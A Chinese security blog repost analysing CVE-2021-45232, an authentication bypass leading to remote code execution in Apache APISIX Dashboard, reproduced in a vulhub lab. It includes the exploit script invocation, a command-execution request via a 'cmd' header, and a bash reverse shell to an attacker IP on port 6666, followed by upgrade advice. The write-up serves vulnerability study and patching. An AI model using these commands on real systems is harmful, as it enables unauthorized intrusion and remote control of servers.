CVE-2021-45232:Apache APISIX Dashboard RCE简析

admin
admin
admin
139574
文章
114
评论
2022年11月11日11:58:22评论137 views字数 1333阅读4分26秒阅读模式
CVE-2021-45232:Apache APISIX Dashboard RCE简析

漏洞概述

Apache APISIX 是一个动态、实时、高性能的 API 网关,Apache APISIX Dashboard 使用户可通过前端界面操作 Apache APISIX

2.10.1之前的Apache APISIX Dashboard中,Manager API使用了两个框架gindroplet,并在gin框架的基础上引入了droplet框架。所有的API和鉴权中间件都是基于droplet框架开发的,但是有些API直接使用了 框架gin 的接口,从而绕过身份验证进而可导致远程代码执行。漏洞编号为CVE-2021-45232,漏洞等级:高危
CVE-2021-45232:Apache APISIX Dashboard RCE简析
影响版本

  • Apache APISIX Dashboard < 2.10.1

CVE-2021-45232:Apache APISIX Dashboard RCE简析
环境搭建

本次使用vulhub搭建本地测试环境进行复现:

第一步,执行以下命令,将vulhub环境拉取到本地。

git clone https://github.com/vulhub/vulhub

CVE-2021-45232:Apache APISIX Dashboard RCE简析

第二步,执行以下命令,启动服务。

cd vulhub-master/apisix/CVE-2021-45232docker-compose up -d

CVE-2021-45232:Apache APISIX Dashboard RCE简析

第三步,执行docker ps命令查看容器运行状况

CVE-2021-45232:Apache APISIX Dashboard RCE简析

第四步,访问http://your-ip:9000即可看到Apache APISIX Dashboard的登录页面。

CVE-2021-45232:Apache APISIX Dashboard RCE简析

CVE-2021-45232:Apache APISIX Dashboard RCE简析
漏洞复现
1.命令执行
利用/apisix/admin/migrate/export和/apisix/admin/migrate/import两个Apache APISIX Dashboard提供的未授权API,可以简单地导入一个恶意配置文件,这里通过漏洞利用脚本来进行攻击。
首先,下载脚本:
git clone https://github.com/wuppp/cve-2021-45232-exp

CVE-2021-45232:Apache APISIX Dashboard RCE简析

CVE-2021-45232:Apache APISIX Dashboard RCE简析
通过漏洞利用脚本来添加恶意脚本。
python3 apisix_dashboard_rce.py http://127.0.0.1:9000
CVE-2021-45232:Apache APISIX Dashboard RCE简析
添加完恶意脚本后,需要访问Apache APISIX中对应的路径来触发前面添加的脚本。而Apache APISIX和Apache APISIX Dashboard是两个不同的服务,Apache APISIX Dashboard只是一个管理页面,而添加的路由是位于Apache APISIX中,所以需要找到Apache APISIX监听的端口或域名。
在当前环境下,Apache APISIX监听在9080端口下。执行如下命令来执行“id”命令。
curl http://127.0.0.1:9080/HLghCe -H "cmd: id"

CVE-2021-45232:Apache APISIX Dashboard RCE简析

2.反弹shell
攻击机kali监听6666端口

CVE-2021-45232:Apache APISIX Dashboard RCE简析

执行如下命令:
curl http://127.0.0.1:9080/HLghCe -H "cmd: bash -c 'exec bash -i &>/dev/tcp/192.168.150.191/6666 <&1'"

CVE-2021-45232:Apache APISIX Dashboard RCE简析

成功获取shell

CVE-2021-45232:Apache APISIX Dashboard RCE简析

CVE-2021-45232:Apache APISIX Dashboard RCE简析
漏洞修复

受影响用户可根据影响范围中的信息,排查并升级到安全版本。下载链接:

https://github.com/apache/apisix-dashboard/releases

CVE-2021-45232:Apache APISIX Dashboard RCE简析


CVE-2021-45232:Apache APISIX Dashboard RCE简析

原文始发于微信公众号(第59号):CVE-2021-45232:Apache APISIX Dashboard RCE简析

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年11月11日11:58:22
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   CVE-2021-45232:Apache APISIX Dashboard RCE简析https://cn-sec.com/archives/1403429.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息